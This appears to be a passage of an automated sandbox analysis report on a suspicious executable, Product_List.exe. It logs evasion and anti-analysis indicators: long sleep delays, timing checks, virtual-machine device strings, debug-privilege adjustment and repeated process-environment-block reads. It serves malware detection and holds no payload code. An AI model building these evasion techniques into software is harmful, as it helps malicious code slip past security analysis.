          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exe TID: 7104Thread sleep time: -41202s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exe TID: 2040Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4668Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01835BA5 rdtsc 3_2_01835BA5
          Source: C:\Users\user\Desktop\Product_List.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeThread delayed: delay time: 41202Jump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.820811920.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.672201614.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000002.816897266.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000003.672201614.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.672829256.000000000CFB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.824247023.000000000CFB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
          Source: cmd.exe, 00000005.00000002.811239362.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: explorer.exe, 00000004.00000003.673534115.000000000CDE5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: cmd.exe, 00000005.00000002.815422515.0000000007540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.820811920.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: explorer.exe, 00000004.00000002.824316412.000000000CFBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.673238107.000000000CFB8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.672829256.000000000CFB6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01835BA5 rdtsc 3_2_01835BA5
          Source: C:\Users\user\Desktop\Product_List.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h]3_2_0176B171
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h]3_2_0176B171
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176C962 mov eax, dword ptr fs:[00000030h]3_2_0176C962
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h]3_2_0178B944
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h]3_2_0178B944
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179513A mov eax, dword ptr fs:[00000030h]3_2_0179513A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179513A mov eax, dword ptr fs:[00000030h]3_2_0179513A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01784120 mov ecx, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]3_2_01769100
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]3_2_01769100
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]3_2_01769100
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]3_2_0176B1E1
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]3_2_0176B1E1
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]3_2_0176B1E1
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017F41E8 mov eax, dword ptr fs:[00000030h]3_2_017F41E8
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E69A6 mov eax, dword ptr fs:[00000030h]3_2_017E69A6
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h]3_2_017961A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h]3_2_017961A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792990 mov eax, dword ptr fs:[00000030h]3_2_01792990
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178C182 mov eax, dword ptr fs:[00000030h]3_2_0178C182
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179A185 mov eax, dword ptr fs:[00000030h]3_2_0179A185
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01780050 mov eax, dword ptr fs:[00000030h]3_2_01780050
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01780050 mov eax, dword ptr fs:[00000030h]3_2_01780050
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]3_2_017E7016
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]3_2_017E7016
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]3_2_017E7016
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01834015 mov eax, dword ptr fs:[00000030h]3_2_01834015
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01834015 mov eax, dword ptr fs:[00000030h]3_2_01834015
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017658EC mov eax, dword ptr fs:[00000030h]3_2_017658EC
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FB8D0 mov ecx, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179F0BF mov ecx, dword ptr fs:[00000030h]3_2_0179F0BF
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h]3_2_0179F0BF
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h]3_2_0179F0BF
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A90AF mov eax, dword ptr fs:[00000030h]3_2_017A90AF
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01822073 mov eax, dword ptr fs:[00000030h]3_2_01822073
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769080 mov eax, dword ptr fs:[00000030h]3_2_01769080
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01831074 mov eax, dword ptr fs:[00000030h]3_2_01831074
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h]3_2_017E3884
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h]3_2_017E3884
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0181D380 mov ecx, dword ptr fs:[00000030h]3_2_0181D380
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h]3_2_01793B7A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h]3_2_01793B7A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182138A mov eax, dword ptr fs:[00000030h]3_2_0182138A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176DB60 mov ecx, dword ptr fs:[00000030h]3_2_0176DB60
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01835BA5 mov eax, dword ptr fs:[00000030h]3_2_01835BA5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176F358 mov eax, dword ptr fs:[00000030h]3_2_0176F358
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176DB40 mov eax, dword ptr fs:[00000030h]3_2_0176DB40
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178DBE9 mov eax, dword ptr fs:[00000030h]3_2_0178DBE9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182131B mov eax, dword ptr fs:[00000030h]3_2_0182131B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h]3_2_017E53CA
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h]3_2_017E53CA
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]3_2_01794BAD
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]3_2_01794BAD
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]3_2_01794BAD
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01838B58 mov eax, dword ptr fs:[00000030h]3_2_01838B58
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179B390 mov eax, dword ptr fs:[00000030h]3_2_0179B390
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792397 mov eax, dword ptr fs:[00000030h]3_2_01792397
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h]3_2_01771B8F
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h]3_2_01771B8F
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A927A mov eax, dword ptr fs:[00000030h]3_2_017A927A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017F4257 mov eax, dword ptr fs:[00000030h]3_2_017F4257
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]3_2_01769240
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h]3_2_017A4A2C
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h]3_2_017A4A2C
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h]3_2_0176AA16
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h]3_2_0176AA16
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01783A1C mov eax, dword ptr fs:[00000030h]3_2_01783A1C
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01765210 mov ecx, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]3_2_01765210
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01778A0A mov eax, dword ptr fs:[00000030h]3_2_01778A0A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792AE4 mov eax, dword ptr fs:[00000030h]3_2_01792AE4
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792ACB mov eax, dword ptr fs:[00000030h]3_2_01792ACB
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h]3_2_0177AAB0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h]3_2_0177AAB0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179FAB0 mov eax, dword ptr fs:[00000030h]3_2_0179FAB0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]3_2_017652A5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182EA55 mov eax, dword ptr fs:[00000030h]3_2_0182EA55
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h]3_2_0181B260
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h]3_2_0181B260
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01838A62 mov eax, dword ptr fs:[00000030h]3_2_01838A62
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h]3_2_0179D294
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h]3_2_0179D294
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h]3_2_0178C577
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h]3_2_0178C577
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01787D50 mov eax, dword ptr fs:[00000030h]3_2_01787D50
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018305AC mov eax, dword ptr fs:[00000030h]3_2_018305AC
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_018305AC mov eax, dword ptr fs:[00000030h]3_2_018305AC
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017A3D43 mov eax, dword ptr fs:[00000030h]3_2_017A3D43
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E3540 mov eax, dword ptr fs:[00000030h]3_2_017E3540
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]3_2_01794D3B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]3_2_01794D3B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]3_2_01794D3B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]3_2_01773D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0176AD30 mov eax, dword ptr fs:[00000030h]3_2_0176AD30
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017EA537 mov eax, dword ptr fs:[00000030h]3_2_017EA537
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]3_2_0182FDE2
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01818DF1 mov eax, dword ptr fs:[00000030h]3_2_01818DF1
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]3_2_0177D5E0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]3_2_0177D5E0
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01838D34 mov eax, dword ptr fs:[00000030h]3_2_01838D34
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E6DC9 mov ecx, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]3_2_017E6DC9
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0182E539 mov eax, dword ptr fs:[00000030h]3_2_0182E539
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]3_2_01791DB5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]3_2_01791DB5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]3_2_01791DB5
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017935A1 mov eax, dword ptr fs:[00000030h]3_2_017935A1
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]3_2_0179FD9B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]3_2_0179FD9B
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]3_2_01792581
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]3_2_01762D8A
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0178746D mov eax, dword ptr fs:[00000030h]3_2_0178746D
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]3_2_017FC450
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]3_2_017FC450
          Source: C:\Users\user\Desktop\Product_List.exeCode function: 3_2_0179A44B mov eax, dword ptr fs:[00000030h]3_2_0179A44B
